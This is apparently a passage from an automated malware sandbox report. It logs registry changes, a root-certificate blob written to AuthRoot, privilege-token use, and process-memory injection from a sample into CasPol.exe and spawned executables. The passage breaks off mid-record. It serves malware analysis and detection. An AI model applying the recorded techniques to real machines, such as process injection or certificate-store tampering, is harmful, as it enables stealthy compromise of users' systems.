TzWEsjzZHXRT2qZRVwsfHlsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WerFault.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" TzWEsjzZHXRT2qZRVwsfHlsJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" TzWEsjzZHXRT2qZRVwsfHlsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-3142 = "South Sudan Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" TzWEsjzZHXRT2qZRVwsfHlsJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" TzWEsjzZHXRT2qZRVwsfHlsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" ZEg1uS8vn7QD2IVsRMo1jWM1.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" TzWEsjzZHXRT2qZRVwsfHlsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-3052 = "Qyzylorda Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" windefender.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e bZqLb8FuXLk6j9hSMqddSMxk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e bZqLb8FuXLk6j9hSMqddSMxk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e bZqLb8FuXLk6j9hSMqddSMxk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 bZqLb8FuXLk6j9hSMqddSMxk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e bZqLb8FuXLk6j9hSMqddSMxk.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3204 powershell.exe 3204 powershell.exe 3792 Conhost.exe 3792 Conhost.exe 2604 reg.exe 2604 reg.exe 3792 Conhost.exe 2604 reg.exe 4552 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 4552 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 4952 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 4952 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1324 powershell.exe 4060 powershell.exe 4060 powershell.exe 1324 powershell.exe 4060 powershell.exe 1324 powershell.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 5072 powershell.exe 5072 powershell.exe 5072 powershell.exe 628 WerFault.exe 628 WerFault.exe 628 WerFault.exe 2712 reg.exe 2712 reg.exe 2712 reg.exe 4936 schtasks.exe 4936 schtasks.exe 4936 schtasks.exe 4384 powershell.EXE 4384 powershell.EXE 3556 powershell.exe 3556 powershell.exe 3556 powershell.exe 4384 powershell.EXE 4272 powershell.exe 4272 powershell.exe 4272 powershell.exe 1812 reg.exe 1812 reg.exe 1812 reg.exe 3928 injector.exe 3928 injector.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3724 CasPol.exe Token: SeDebugPrivilege 3204 powershell.exe Token: SeDebugPrivilege 3792 Conhost.exe Token: SeDebugPrivilege 2604 reg.exe Token: SeDebugPrivilege 4552 ZEg1uS8vn7QD2IVsRMo1jWM1.exe Token: SeImpersonatePrivilege 4552 ZEg1uS8vn7QD2IVsRMo1jWM1.exe Token: SeDebugPrivilege 4952 TzWEsjzZHXRT2qZRVwsfHlsJ.exe Token: SeImpersonatePrivilege 4952 TzWEsjzZHXRT2qZRVwsfHlsJ.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeDebugPrivilege 628 WerFault.exe Token: SeDebugPrivilege 2712 reg.exe Token: SeDebugPrivilege 4936 schtasks.exe Token: SeDebugPrivilege 4384 powershell.EXE Token: SeDebugPrivilege 3556 powershell.exe Token: SeDebugPrivilege 4272 powershell.exe Token: SeDebugPrivilege 1812 reg.exe Token: SeSystemEnvironmentPrivilege 1960 csrss.exe Token: SeSecurityPrivilege 3276 sc.exe Token: SeSecurityPrivilege 3276 sc.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 3960 powershell.exe Token: SeDebugPrivilege 4828 powershell.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4368 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2132 wrote to memory of 3204 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 92 PID 2132 wrote to memory of 3204 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 92 PID 2132 wrote to memory of 3204 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 92 PID 2132 wrote to memory of 3724 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 94 PID 2132 wrote to memory of 3724 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 94 PID 2132 wrote to memory of 3724 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 94 PID 2132 wrote to memory of 3724 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 94 PID 2132 wrote to memory of 3724 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 94 PID 2132 wrote to memory of 3724 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 94 PID 2132 wrote to memory of 3724 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 94 PID 2132 wrote to memory of 3724 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 94 PID 3724 wrote to memory of 4552 3724 CasPol.exe 96 PID 3724 wrote to memory of 4552 3724 CasPol.exe 96 PID 3724 wrote to memory of 4552 3724 CasPol.exe 96 PID 3724 wrote to memory of 4952 3724 CasPol.exe 99 PID 3724 wrote to memory of 4952 3724 CasPol.exe 99 PID 3724 wrote to memory of 4952 3724 CasPol.exe 99 PID 4952 wrote to memory of 3792 4952 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 278 PID 4952 wrote to memory of 3792 4952 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 278 PID 4952 wrote to memory of 3792 4952 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 278 PID 4552 wrote to memory of 2604 4552 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 358 PID 4552 wrote to memory of 2604 4552 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 358 PID 4552 wrote to memory of 2604 4552 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 358 PID 3724 wrote to memory of 1896 3724 CasPol.exe 155 PID 3724 wrote to memory of 1896 3724 CasPol.exe 155 PID 3724 wrote to memory of 1896 3724 CasPol.exe 155 PID 1896 wrote to memory of 1760 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 156 PID 1896 wrote to memory of 1760 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 156 PID 1896 wrote to memory of 1760 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 156 PID 3724 wrote to memory of 2724 3724 CasPol.exe 157 PID 3724 wrote to memory of 2724 3724 CasPol.exe 157 PID 1896 wrote to memory of 4368 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 269 PID 1896 wrote to memory of 4368 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 269 PID 1896 wrote to memory of 4368 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 269 PID 1896 wrote to memory of 3996 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 159 PID 1896 wrote to memory of 3996 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 159 PID 1896 wrote to memory of 3996 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 159 PID 3996 wrote to memory of 4416 3996 bZqLb8FuXLk6j9hSMqddSMxk.exe 160 PID 3996 wrote to memory of 4416 3996 bZqLb8FuXLk6j9hSMqddSMxk.exe 160 PID 3996 wrote to memory of 4416 3996 bZqLb8FuXLk6j9hSMqddSMxk.exe 160 PID 3184 wrote to memory of 1324 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 334 PID 3184 wrote to memory of 1324 3184 